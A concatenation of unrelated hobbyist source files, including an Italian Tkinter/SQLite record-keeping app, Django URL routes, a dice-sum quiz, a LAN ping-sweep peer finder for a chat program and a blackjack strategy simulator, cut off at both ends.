my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n def query_Suffragi_database_BY_DATE():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # sql_select_query = \"\"\"select * from TABLE_Messe where Anno = ? and Mese = ? order by ID DESC \"\"\"\n # c.execute(sql_select_query, (2024, 'gennaio',))\n # records = c.fetchall()\n # for x in records:\n # print(x)\n # print('##################################################')\n\n c.execute(\"SELECT * FROM TABLE_Suffragi ORDER BY Anno, (CASE Mese\\\n WHEN 'gennaio' THEN 1\\\n WHEN 'febbraio' THEN 2\\\n WHEN 'marzo' THEN 3\\\n WHEN 'aprile' THEN 4\\\n WHEN 'maggio' THEN 5\\\n WHEN 'giugno' THEN 6\\\n WHEN 'luglio' THEN 7\\\n WHEN 'agosto' THEN 8\\\n WHEN 'settembre' THEN 9\\\n WHEN 'ottobre' THEN 10\\\n WHEN 'novembre' THEN 11\\\n WHEN 'dicembre' THEN 12\\\n END), Suffragi;\")\n\n records = c.fetchall()\n # for x in records:\n # print(x)\n\n # for record in records:\n # print(record)\n # record[0] = id key\n\n # COLORI RIGHE pari e dispari\n # count = 0\n # Create striped row tags\n my_tree.tag_configure('white', background=\"pink\")\n my_tree.tag_configure('blue', background=\"salmon\")\n my_tree.tag_configure('yellow', background=\"lightyellow\")\n my_tree.tag_configure('violet', background=\"khaki\")\n\n for record in records:\n if record[2] == 'gennaio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3]),\n tags=('white'))\n elif record[2] == 'febbraio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3]),\n tags=('blue'))\n elif record[2] == 'marzo':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('yellow'))\n elif record[2] == 'aprile':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('violet'))\n elif record[2] == 'maggio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('white'))\n elif record[2] == 'giugno':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('blue'))\n elif record[2] == 'luglio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('yellow'))\n elif record[2] == 'agosto':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('violet'))\n elif record[2] == 'settembre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('white'))\n elif record[2] == 'ottobre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('blue'))\n\n elif record[2] == 'novembre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('yellow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3]),\n tags=('violet'))\n # count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n def remove_one():\n # my_tree.focus() restituisce l'ID della riga selezionata\n row_id = my_tree.focus()\n my_tree.delete(row_id)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # Delete From Database\n c.execute(\"DELETE from TABLE_Suffragi WHERE oid =\" + row_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n #\n def submit():\n conn = sqlite3.connect('database_messe_orizzontale')\n cur = conn.cursor()\n dati = [Entry_Anno_Suffragi.get(), Entry_Mese_Suffragi.get(), Entry_Suffragi_StringVar.get()]\n dati_suffragi = [Entry_Suffragi_StringVar.get()]\n cur.execute('INSERT INTO TABLE_Suffragi (Anno, Mese, Suffragi) VALUES (?,?,?)', dati)\n\n # cur.execute(\"insert into TABLE_Celebranti (Celebranti) values ('?'), dati\")\n # cur.execute('''INSERT INTO TABLE_Celebranti (Celebranti) VALUES (\"Entry_Celebranti_StringVar.get()\")''')\n conn.commit()\n # Close our connection\n conn.close()\n\n\n B_add_Suffragi = Button(Frame_Suffragi, text='aggiungi', width=10, command=lambda: [submit(), query_suffragi_database()]).grid(row=0,column=3, sticky=W, pady=5)\n B_delete_Suffragi = Button(Frame_Suffragi, text='cancella', width=10, command=remove_one).grid(row=1,column=3, sticky=W)\n B_Tree_Suffragi_sort_by_ID = Button(Frame_Suffragi, text='Sort ID', width=10, command=query_suffragi_database).grid(row=2,column=3, sticky=W)\n B_Tree_Suffragi_sort_by_Date = Button(Frame_Suffragi, text='Sort Data', width=10, command=query_Suffragi_database_BY_DATE).grid(row=3,column=3, sticky=W)\n query_suffragi_database()\n\n\n\nB_add = Button(Frame_tree_Buttons, text='aggiungi', width=10, command=lambda: [submit(), query_database()]).pack(side=TOP, pady=20)\n#B_excel = Button(Frame_tree_Buttons, text='Filtro_excel', width=10, command=sqlite3_to_excel).pack(side=TOP, pady=20)\n#B_update = Button(Frame_tree_Buttons, text='aggiorna', width=10, command='').pack(side=TOP, pady=20)\nB_delete = Button(Frame_tree_Buttons, text='cancella', width=10, command=remove_one).pack(side=TOP, pady=20)\nB_Nomi_Celebranti = Button(Frame_tree_Buttons, text='Celebranti', width=10, command=Top_W_Celebranti).pack(side=BOTTOM, pady=20)\nB_Tree_sort_by_ID=Button(Frame_tree_Buttons, text='Sort ID', width=10, command=query_database).pack(side=TOP, pady=20)\nB_Tree_sort_by_Date=Button(Frame_tree_Buttons, text='Sort Data', width=10, command=lambda: [query_database_BY_DATE()]).pack(side=TOP, pady=20)\n\nSuffragi_Comunitari()\nquery_database()\nroot.mainloop()","repo_name":"fragiaco/python_CONTI_01","sub_path":"conti_convento_workinprogress_messe_orizzontale_04.py","file_name":"conti_convento_workinprogress_messe_orizzontale_04.py","file_ext":"py","file_size_in_byte":52667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73104803308","text":"from django.urls import path\nfrom apps.archivero.views import *\n\nurlpatterns = [\n #redireccionamiento para listar los años del archivero\n path('inicio_anios/',Inicio_Anios.as_view(),name='inicio_anios'), \n path('listaranios/',ListarAnios.as_view(),name='listaranios'), \n #redireccionamiento agregar ver los años del archivero\n path('crearanios/',CrearAnios.as_view(),name='crearanios'), \n #redireccionamiento para editar los años del archivero\n path(\"actualizaranios//\",EditarAnios.as_view(), name=\"actualizaranios\"), \n #redireccionamiento para eliminar los años del archivero\n path(\"eliminaranios//\",EliminarAnios.as_view(), name=\"eliminaranios\"), \n\n #redireccionamiento para listar los temas del archivero\n path('inicio_temas/',Inicio_Temas.as_view(),name='inicio_temas'), \n path('listartemas/',ListarTemas.as_view(),name='listartemas'), \n #redireccionamiento agregar ver los temas del archivero\n path('creartemas/',CrearTemas.as_view(),name='creartemas'), \n #redireccionamiento para editar los temas del archivero\n path(\"actualizartemas//\",EditarTemas.as_view(), name=\"actualizartemas\"), \n #redireccionamiento para eliminar los temas del archivero\n path(\"eliminartemas//\",EliminarTemas.as_view(), name=\"eliminartemas\"), \n\n #redireccionamiento para listar la relacion año tema\n path('inicio_anios_temas/',Inicio_Anios_Temas.as_view(),name='inicio_anios_temas'), \n path('listaraniostemas/',ListarAniosTemas.as_view(),name='listaraniostemas'), \n #redireccionamiento agregar ver la relacion año tema\n path('crearaniostemas/',CrearAniosTemas.as_view(),name=\"crearaniostemas\"), \n #redireccionamiento para editar la relacion año tema\n path(\"actualizaraniostemas//\",EditarAniosTemas.as_view(), name=\"actualizaraniostemas\"), \n #redireccionamiento para eliminar la relacion año tema\n path(\"eliminaraniostemas//\",EliminarAniosTemas.as_view(), name=\"eliminaraniostemas\"), \n\n\n #redireccionamiento para listar documentos\n path('inicio_documentos/',Inicio_Documentos.as_view(),name='inicio_documentos'), \n path('listardocumentos/',ListarDocumentos.as_view(),name='listardocumentos'), \n #redireccionamiento agregar ver documentos\n path('creardocumentos/',CrearDocumentos.as_view(),name='creardocumentos'), \n #redireccionamiento para editar documentos\n path(\"actualizardocumentos//\",EditarDocumentos.as_view(), name=\"actualizardocumentos\"), \n #redireccionamiento para eliminar documentos\n path(\"eliminardocumentos//\",EliminarDocumentos.as_view(), name=\"eliminardocumentos\"), \n\n\n path('vista_documentos/',VistaDocs.as_view(), name=\"vista_documentos\"),\n\n path('lectura_documentos/',LecturaDocumentos.as_view(), name=\"lectura_documentos\"),\n path('reporte_documentos//',ReporteDocumentos.as_view(), name=\"reporte_documentos\"),\n\n\n\n]","repo_name":"kevinitsDevaluado/do","sub_path":"apps/archivero/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11474472959","text":"import random\nimport time\n\nDICE_WIDTH = 9\nDICE_HEIGHT = 5\nCANVAS_WIDTH = 79\nCANVAS_HEIGHT = 24 - 3\n\nQUIZ_DURATION = 30\nMIN_DICE = 2\nMAX_DICE = 6\n\nREWARD = 4\nPENALTY = 1\n\nD1 = ([\"+-------+\",\n \"| |\",\n \"| 0 |\",\n \"| |\",\n \"+-------+\"], 1)\nD2a = ([\"+-------+\",\n \"| 0 |\",\n \"| |\",\n \"| 0 |\",\n \"+-------+\"], 2)\nD2b = ([\"+-------+\",\n \"| 0 |\",\n \"| |\",\n \"| 0 |\",\n \"+-------+\"], 2)\nD3a = ([\"+-------+\",\n \"| 0 |\",\n \"| 0 |\",\n \"| 0 |\",\n \"+-------+\"], 3)\nD3b = ([\"+-------+\",\n \"| 0 |\",\n \"| 0 |\",\n \"| 0 |\",\n \"+-------+\"], 3)\nD4 = ([\"+-------+\",\n \"| 0 0 |\",\n \"| |\",\n \"| 0 0 |\",\n \"+-------+\"], 4)\nD5 = ([\"+-------+\",\n \"| 0 0 |\",\n \"| 0 |\",\n \"| 0 0 |\",\n \"+-------+\"], 5)\nD6a = ([\"+-------+\",\n \"| 0 0 |\",\n \"| 0 0 |\",\n \"| 0 0 |\",\n \"+-------+\"], 6)\nD6b = ([\"+-------+\",\n \"| 0 0 0 |\",\n \"| |\",\n \"| 0 0 0 |\",\n \"+-------+\"], 6)\n\nALL_DICE = (D1, D2a, D2b, D3a, D3b, D4, D5, D6a, D6b)\n\ninput(\"Print enter to begin...\")\ncorrectAnswer = incorrectAnswer = 0\nstartTime = time.time()\n# end after \"QUIZ_DURATION\" seconds\nwhile (time.time() < startTime + QUIZ_DURATION):\n sumAnswer = 0\n diceFaces = []\n # create random number of dice\n for i in range(random.randint(MIN_DICE, MAX_DICE)):\n die = random.choice(ALL_DICE)\n diceFaces.append(die[0])\n sumAnswer += die[1]\n \n topLeftDiceCorners = []\n for i in range(len(diceFaces)):\n while (True):\n # locate the dice's places\n left = random.randint(0, CANVAS_WIDTH - 1 - DICE_WIDTH)\n top = random.randint(0, CANVAS_HEIGHT - 1 - DICE_HEIGHT)\n \n topLeftX = left\n topLeftY = top\n topRightX = left + DICE_WIDTH\n topRightY = top\n bottomLeftX = left\n bottomLeftY = top + DICE_HEIGHT\n bottomRightX = left + DICE_WIDTH\n bottomRightY = top + DICE_HEIGHT\n \n # check overlap\n overlaps = False\n for prevDieLeft, prevDieTop in topLeftDiceCorners:\n prevDieRight = prevDieLeft + DICE_WIDTH\n prevDieBottom = prevDieTop + DICE_HEIGHT\n for cornerX, cornerY in ((topLeftX, topLeftY), (topRightX, topRightY), (bottomLeftX, bottomLeftY), (bottomRightX, bottomRightY)):\n if (prevDieLeft <= cornerX < prevDieRight and prevDieTop <= cornerY < prevDieBottom):\n overlaps = True\n \n if (not overlaps):\n topLeftDiceCorners.append((left, top))\n break\n \n # locate the dice\n canvas = {}\n for i, (dieLeft, dieTop) in enumerate(topLeftDiceCorners):\n dieFace = diceFaces[i]\n for dx in range(DICE_WIDTH):\n for dy in range(DICE_HEIGHT):\n canvasX = dieLeft + dx\n canvasY = dieTop + dy\n canvas[(canvasX, canvasY)] = dieFace[dy][dx]\n \n for cy in range(CANVAS_HEIGHT):\n for cx in range(CANVAS_WIDTH):\n print(canvas.get((cx, cy), \" \"), end = \"\")\n print(\"\")\n \n # check the input whether correct\n response = input(\"Enter the sum: \").strip()\n if (response.isdecimal() and int(response) == sumAnswer):\n correctAnswer += 1\n else:\n print(f\"Incorrect, the answer is {sumAnswer}.\")\n time.sleep(2)\n incorrectAnswer += 1\n \n# display result\nscore = correctAnswer * REWARD - incorrectAnswer * PENALTY\nprint(f\"Correct: {correctAnswer}\")\nprint(f\"Incorrect: {incorrectAnswer}\")\nprint(f\"Score: {score}\")","repo_name":"Ming06-22/python_games","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28233358497","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 20 19:30:19 2022\n\n@author: Marlou\n\"\"\"\n\nimport os\nimport threading\nimport socket\nfrom datetime import datetime\n\nglobal dict_Other_users\n\ndict_Other_users = {'IP':[],'Status':[],'Name':[],'MAC':[]}\n\ndef getMyIp():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Создаем сокет (UDP)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) # Настраиваем сокет на BROADCAST вещание.\n s.connect(('', 0))\n return s.getsockname()[0]\n\ndef scan_Ip(ip, str_Self_Ip):\n global dict_Other_users\n \n addr = str_Self_Ip + str(ip)\n comm = \"ping -n 1 -a \" + addr\n response = os.popen(comm)\n data = response.readlines()\n\n for line in data:\n if ( '['+ addr +']' ) in line:\n dict_Other_users['IP'].append(addr)\n dict_Other_users['Status'].append('Ping_Ok')\n \n break\n\ndef find_other_users():\n global dict_Other_users\n \n str_Self_Ip = getMyIp()\n print('You IP :',str_Self_Ip)\n net_split = str_Self_Ip.split('.')\n str_Self_Ip = net_split[0] + '.' + net_split[1] + '.' + net_split[2] + '.'\n \n start_point = 1\n end_point = 255\n print(f'Search from {start_point} to {end_point}')\n \n int_Tine_Start = datetime.now()\n print(\"Scanning in Progress:\")\n print('IP Status Name MAC')\n for ip in range(start_point, end_point):\n # scan_Ip(ip,str_Self_Ip)\n if ip == int(net_split[3]):\n continue\n thread_Target = threading.Thread(target=scan_Ip, args=[ip,str_Self_Ip])\n thread_Target.start()\n \n thread_Target.join()\n int_Tine_End = datetime.now()\n int_Total_Time = int_Tine_End - int_Tine_Start\n\n print ('Find ip :',len(dict_Other_users['IP']))\n print(\"Scanning completed in: \", int_Total_Time)\n \n # dict_Other_users = json.dumps(strin,separators='|')\n \nfind_other_users()\n\nprint(dict_Other_users)","repo_name":"MarlouOne/Lan_PTP","sub_path":"Old/PTP_Chat_2.py","file_name":"PTP_Chat_2.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13917000962","text":"\n# linhas = int(input(\"Tamanho da arvore? \"))\n# tamanho = int(linhas * 2 - 1)\n# espacos = int((tamanho - 1) / 2)\n# i = 1\n \n# while i <= linhas:\n# \tprint (\" \" * (espacos - i + 1), \"*\" * (2 * i - 1))\n# \ti = i + 1\n\n\n# def retorna_guiche_ingresso(ingresso_numero):\n# num_ing=ingresso_numero\n \n \n# qtd=[]\n# num=[] \n# i=0 \n# x=0\n# def valor(): \n# while i <= 6:\n# if(i == 0): \n# qtd.append(0)\n# else:\n# qtd.append(2 * i - 1) \n# i+=1\n \n# def guinche():\n# while i <=6:\n# num.append(i) \n# i+=1\n\n# def teste():(\n# ult=len(qtd)-1\n# if num_ing < soma and num_ing < (soma-qtd):\n# print(\"ok\")\n# else: \n# print(\"No\") \n\n# def mostrar():\n# while x<=6:\n# print (\" Ghinche\",num[x],\"->\", qtd[x]) \n# x+=1\n# soma=sum(qtd)\n# print(soma)\n\n\n\n# num_ing \n\n# return\n \n \n# print(retorna_guiche_ingresso(26))\n\n\n\n#MELHOR VERSAO \n# def retorna_guiche_ingresso(ingresso_numero):\n# num_ing=ingresso_numero\n# qtd=[]\n# num=[] \n# i=0 \n# while i <= 6:\n# if(i == 0): \n# qtd.append(0)\n# else:\n# qtd.append(2 * i - 1) \n# i+=1\n \n# i=0\n# while i <=6:\n# num.append(i) \n# i+=1\n \n# x=0\n# while x<=6:\n# print (\" Ghinche\",num[x],\"->\", qtd[x]) \n# x+=1\n# soma=sum(qtd)\n# print(soma)\n\n# ult=len(qtd)-1\n# ok=sum(qtd)-qtd[ult]\n# if num_ing < soma and num_ing > (qtd[ult]):\n# print(\"Guinche\",ult,ok)\n# else: \n# print(\"No\",ult)\n\n# num_ing \n# return\n \n \n# print(retorna_guiche_ingresso(26))\n\n\n\n\n#Teste \n# def retorna_guiche_ingresso(ingresso_numero):\n# num_ing=ingresso_numero\n# qtd=[]\n# num=[] \n# i=0\n# while True:\n# if(i == 0): \n# qtd.append(0)\n# else:\n# qtd.append(2 * i - 1) \n \n# if num_ing in qtd:\n# print(\"OK\")\n# break\n# False\n# i+=1\n# i+=1\n# print(\"Ola\")\n \n \n# i=0\n # while True:\n # num.append(i) \n # i+=1\n # if num < num_ing:\n # False\n # x=0\n # while True:\n # print (\" Ghinche\",num[x],\"->\", qtd[x]) \n # x+=1\n # if num < num_ing:\n # False\n\n # soma=sum(qtd)\n # print(soma)\n\n # ult=len(qtd)-1\n # ok=sum(qtd)-qtd[ult]\n # if num_ing < soma and num_ing > (qtd[ult]):\n # print(\"Guinche\",ult,ok)\n # else: \n # print(\"No\",ult)\n\n\n\n# num_ing \n\n# return\n \n \n# print(retorna_guiche_ingresso(26))\n\n\ndef retorna_guiche_ingresso(ingresso_numero):\n num_ing=ingresso_numero\n \n #Verifica qual Guinche\n \n \n def teste(x):\n \n num_ing=ingresso_numero\n ingresso=[]\n guinche=[]\n cont=x\n i=0\n while i <=cont:\n guinche.append(i) \n i+=1\n \n #preenche a lista de quat de ingressos por colun\n i=0 \n while i <= cont:\n if(i == 0): \n ingresso.append(0)\n else:\n ingresso.append(2 * i - 1) \n i+=1\n \n \n x=0\n while x<= cont:\n print (\" Ghinche\",guinche[x],\"->\", ingresso[x]) \n x+=1\n\n\n soma=sum(ingresso)\n print(\"SOMA:\",soma)\n\n ultimo=len(ingresso)-1\n print(\"Ultimo Indice Linha:\",ultimo)\n\n \n ulti_num=sum(ingresso)-ingresso[ultimo]\n print(\"Penul Num Coluna\",ulti_num)\n \n pes=ingresso[ultimo]\n print(\"Valor da ultima Coluna \",pes)\n\n if num_ing <= soma and num_ing >= ulti_num:\n print(\"Guinche\",ultimo,num_ing)\n elif num_ing < ulti_num: \n print(\"Guinche2\",ultimo,num_ing)\n print(\"não foi\")\n\n\n teste(num_ing)\n return\n \n \nprint(retorna_guiche_ingresso(3))\n","repo_name":"JadilsonJR/Python","sub_path":"Questoes/ex8/84.py","file_name":"84.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13845543861","text":"import time\r\nimport random\r\n\r\n# Calculates the possible hand values (soft and hard)\r\n# First checks if there are any aces.\r\n# If so, count the number of aces and find every possible pairing of those aces as 1's and 11's\r\n# The possible hand values will be the sum of the rest of the cards (sum(cards) - numAces) + those combinations of 1's and 11's\r\n# Only add hands to the handValues list if it's <= 21 because everything else is a bust. [] implies no non-bust hands i.e. bust\r\n# If no aces, just sum the card values and append if <= 21.\r\ndef calcHandValues(cards):\r\n haveAces = 1 in cards # check if aces in hand\r\n handValues = [] # initially no hands, can only add a hand if it won't bust\r\n if haveAces: # Aces Case\r\n numAces = cards.count(1)\r\n possibleAces = [(x,y) for x in [0,1,2,3,4] for y in [0,1,2,3,4] if x + y == numAces] # make every (x,y) pair of the num of aces counting as 1 or 11 (x -> 1, y -> 11)\r\n temp = sum(cards) - numAces # Ex: I have two aces. (0,2) or (1,1) or (2,0) => two 11's or one 1, one 11 or two 1's\r\n possibleHands = [temp + (x * 1) + (y * 11) for (x,y) in possibleAces] # add the rest of the cards with those possible ace values\r\n for i in possibleHands:\r\n if i <= 21:\r\n handValues.append(i)\r\n else: # No aces (hard hand)\r\n temp = sum(cards) # simply sum the card values\r\n if temp <= 21:\r\n handValues.append(temp)\r\n return handValues\r\n\r\n# Basic Strategy for Soft hands\r\n# Simply copies the logic for the following chart:\r\n# https://www.blackjackapprenticeship.com/wp-content/uploads/2018/10/mini-blackjack-strategy-chart.png\r\ndef basicStrategySoft(handVal, dealerCard):\r\n if handVal > 18:\r\n return \"STAND\"\r\n elif handVal == 18:\r\n if dealerCard in [9,10,1]:\r\n return \"HIT\"\r\n else:\r\n return \"STAND\"\r\n else:\r\n return \"HIT\"\r\n\r\n# Basic Strategy for Hard hands\r\n# Simply copies the logic for the following chart:\r\n# https://www.blackjackapprenticeship.com/wp-content/uploads/2018/10/mini-blackjack-strategy-chart.png\r\ndef basicStrategyHard(handVal, dealerCard):\r\n if handVal >= 17:\r\n return \"STAND\"\r\n elif handVal > 12:\r\n if dealerCard in [6,7,8,9,10,1]:\r\n return \"HIT\"\r\n else:\r\n return \"STAND\"\r\n elif handVal == 12:\r\n if dealerCard in [4,5,6]:\r\n return \"STAND\"\r\n else:\r\n return \"HIT\"\r\n else:\r\n return \"HIT\"\r\n\r\n# Hit or Stand for the Player Decisions\r\n# This is where all the policies are implemented\r\n# This function looks at the player's cards, dealer's cards, and the player policy to make the decision of HIT or STAND\r\ndef hitOrStand(playerCards, dealerCards, policy):\r\n handValues = calcHandValues(playerCards)\r\n # python 3.10 switch case would make this so much cleaner\r\n if policy == 0: # Stand >= 17\r\n for i in handValues:\r\n if i >= 17:\r\n return \"STAND\"\r\n return \"HIT\"\r\n elif policy == 1: # Stand >= Hard 17\r\n if handValues[len(handValues) - 1] >= 17: # last hand value will always be smallest according to calcHandValues (11's used first)\r\n return \"STAND\"\r\n else:\r\n return \"HIT\"\r\n elif policy == 2: # Always Stand\r\n return \"STAND\"\r\n elif policy == 3: # Hit < 21\r\n if handValues[0] < 21:\r\n return \"HIT\"\r\n return \"STAND\"\r\n elif policy == 4: # Hit <= Soft 17 and stand on dealer 4,5,6\r\n if len(handValues) > 1 and handValues[0] == 17:\r\n return \"HIT\"\r\n if dealerCards[0] in [4,5,6]: # if dealer is showing a 4, 5, 6 on first card, stand\r\n return \"STAND\"\r\n else:\r\n return \"HIT\"\r\n elif policy == 5: # Copy the dealer strategy\r\n if len(handValues) > 1 and handValues[0] == 17:\r\n return \"HIT\"\r\n for i in handValues:\r\n if i >= 17:\r\n return \"STAND\"\r\n return \"HIT\"\r\n elif policy == 6: # Randomly hit/stand\r\n hit = int(random.random() * 2)\r\n if hit:\r\n return \"HIT\"\r\n else:\r\n return \"STAND\"\r\n else: # Basic Strategy\r\n hasSoft = len(handValues) > 1\r\n if hasSoft:\r\n return basicStrategySoft(handValues[0], dealerCards[0])\r\n else:\r\n return basicStrategyHard(handValues[0], dealerCards[0])\r\n\r\n# Picking cards from a single deck\r\n# This implementation relies on the deck \"losing\" cards as cards are drawn\r\n# What it really does is pick a card from the available cards and swaps that card with the first card available in the deck\r\n# It then increments the firstCard value such that the chosen card (swapped one) is no longer in range\r\n# Ex: [1,2,3,4] Let's say we choose 3.\r\n# [3,2,1,4] Swap 3 and first card i.e. 1.\r\n# firstCard = 0 + 1 = 1 The first available card is now set to index 1, which is 2 so the 3 can no longer be accessed.\r\n# This modified deck and the first card that should be available are returned to maintain the deck across multiple player decisions (multiple HITs).\r\ndef pickCardsSingle(deck, cardAmt, firstCard):\r\n deckLength = 52 - firstCard\r\n for i in range(cardAmt):\r\n card = int(random.random() * deckLength) + firstCard\r\n deck[firstCard], deck[card] = deck[card], deck[firstCard]\r\n firstCard += 1\r\n deckLength = 52 - firstCard\r\n return deck, firstCard\r\n\r\n# SINGLE DECK BLACKJACK\r\n# Sets up the initial deck that the player and dealer will be drawing from.\r\n# Picks two cards which will be the player's.\r\n# Picks two more which will be the dealer's.\r\n# The player performs his decisions first and continues until he decides to STAND, busts, or hits 21.\r\n# Dealer then goes and acts according to the dealer strategy.\r\n# If both the player and dealer don't bust or hit 21, they have a showdown.\r\n# Their biggest hand values are compared and whoever has bigger wins or a tie for equal hands.\r\ndef singleDeck(policy):\r\n deckStart = 0 # initially no cards chosen\r\n deck = [1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,6,6,6,6,7,7,7,7,8,8,8,8,9,9,9,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10] # initial deck\r\n deck, deckStart = pickCardsSingle(deck, 2, deckStart) # update deck and deckStart\r\n playerCards = [deck[0], deck[1]] # player gets the first two cards chosen\r\n\r\n deck, deckStart = pickCardsSingle(deck, 2, deckStart) # update deck and deckStart\r\n dealerCards = [deck[2], deck[3]] # dealer gets next two cards\r\n\r\n playerDecision = \"\"\r\n while playerDecision != \"STAND\": # player makes a decision until he stands, busts, or hits 21\r\n handValues = calcHandValues(playerCards) # calculate handvalues\r\n if handValues == []: # empty handValues means you busted\r\n return False\r\n if handValues[0] == 21: # if 21, player wins\r\n return True\r\n playerDecision = hitOrStand(playerCards, dealerCards, policy) # make player decision\r\n if playerDecision == \"HIT\": # if hit, pick another card and add to player's cards\r\n deck, deckStart = pickCardsSingle(deck, 1, deckStart)\r\n playerCards.append(deck[deckStart - 1])\r\n\r\n dealerDecision = \"\"\r\n while dealerDecision != \"STAND\": # same as player\r\n handValues = calcHandValues(dealerCards)\r\n if handValues == []: # bust\r\n return True\r\n if handValues[0] == 21: # blackjack, win\r\n return False\r\n if handValues[0] == 17 and len(handValues) == 2: # if more than one handValue, then there is a soft hand at index 0\r\n dealerDecision = \"HIT\" # hit on soft 17\r\n elif handValues[0] >= 17: # stand on anything > 17 or on hard 17\r\n dealerDecision = \"STAND\"\r\n else:\r\n dealerDecision = \"HIT\" # otherwise (< 17), hit\r\n if dealerDecision == \"HIT\": # if hit, pick a card and add to hand\r\n deck, deckStart = pickCardsSingle(deck, 1, deckStart)\r\n dealerCards.append(deck[deckStart - 1])\r\n\r\n #SHOWDOWN\r\n playerCardValue = calcHandValues(playerCards)[0]\r\n dealerCardValue = calcHandValues(dealerCards)[0]\r\n\r\n # Win = 1\r\n # Loss = 0\r\n # Tie = 2\r\n if playerCardValue > dealerCardValue:\r\n return 1 # player win\r\n elif playerCardValue < dealerCardValue:\r\n return 0 # player loss\r\n else:\r\n return 2 # tie\r\n\r\n# Pick cards from an infinite deck\r\n# Simply defines the possible values for the cards and picks one value randomly\r\n# This could have been simplified with one of each value except 10 which would have four instances for the 10, J, Q, K, but I thought this better represented the idea of choosing any from a complete deck.\r\ndef pickCardsInfinite():\r\n infinite = [1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 9,\r\n 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]\r\n card = int(random.random() * 52)\r\n return infinite[card]\r\n\r\n# INFINITE DECK\r\n# Performs essentially the same game as Single Deck except that cards are drawn using pickCardsInfinite(). No maintaining of deck required.\r\ndef infiniteDeck(policy):\r\n playerCards = [pickCardsInfinite(), pickCardsInfinite()]\r\n\r\n dealerCards = [pickCardsInfinite(), pickCardsInfinite()]\r\n\r\n playerDecision = \"\"\r\n while playerDecision != \"STAND\":\r\n handValues = calcHandValues(playerCards)\r\n if handValues == []:\r\n return False\r\n if handValues[0] == 21:\r\n return True\r\n playerDecision = hitOrStand(playerCards, dealerCards, policy)\r\n if playerDecision == \"HIT\":\r\n playerCards.append(pickCardsInfinite())\r\n\r\n dealerDecision = \"\"\r\n while dealerDecision != \"STAND\":\r\n handValues = calcHandValues(dealerCards)\r\n if handValues == []:\r\n return True # Dealer Bust\r\n if handValues[0] == 21:\r\n return False # Dealer Blackjack\r\n if handValues[0] == 17 and len(handValues) == 2:\r\n dealerDecision = \"HIT\"\r\n elif handValues[0] >= 17:\r\n dealerDecision = \"STAND\"\r\n else:\r\n dealerDecision = \"HIT\"\r\n if dealerDecision == \"HIT\":\r\n dealerCards.append(pickCardsInfinite())\r\n\r\n #SHOWDOWN\r\n playerCardValue = calcHandValues(playerCards)[0]\r\n dealerCardValue = calcHandValues(dealerCards)[0]\r\n\r\n # Win = 1\r\n # Loss = 0\r\n # Tie = 2\r\n if playerCardValue > dealerCardValue:\r\n return 1 # player win\r\n elif playerCardValue < dealerCardValue:\r\n return 0 # player loss\r\n else:\r\n return 2 # tie\r\n\r\n# Keeps track of wins, losses, ties, avg.\r\ndef customGame(playerPolicy, deckType, n):\r\n random.seed(time.time())\r\n wins = 0\r\n losses = 0\r\n ties = 0\r\n\r\n for i in range(n):\r\n if deckType:\r\n wonGame = singleDeck(playerPolicy)\r\n else:\r\n wonGame = infiniteDeck(playerPolicy)\r\n if wonGame == 1:\r\n wins += 1\r\n elif wonGame == 0:\r\n losses += 1\r\n else:\r\n ties += 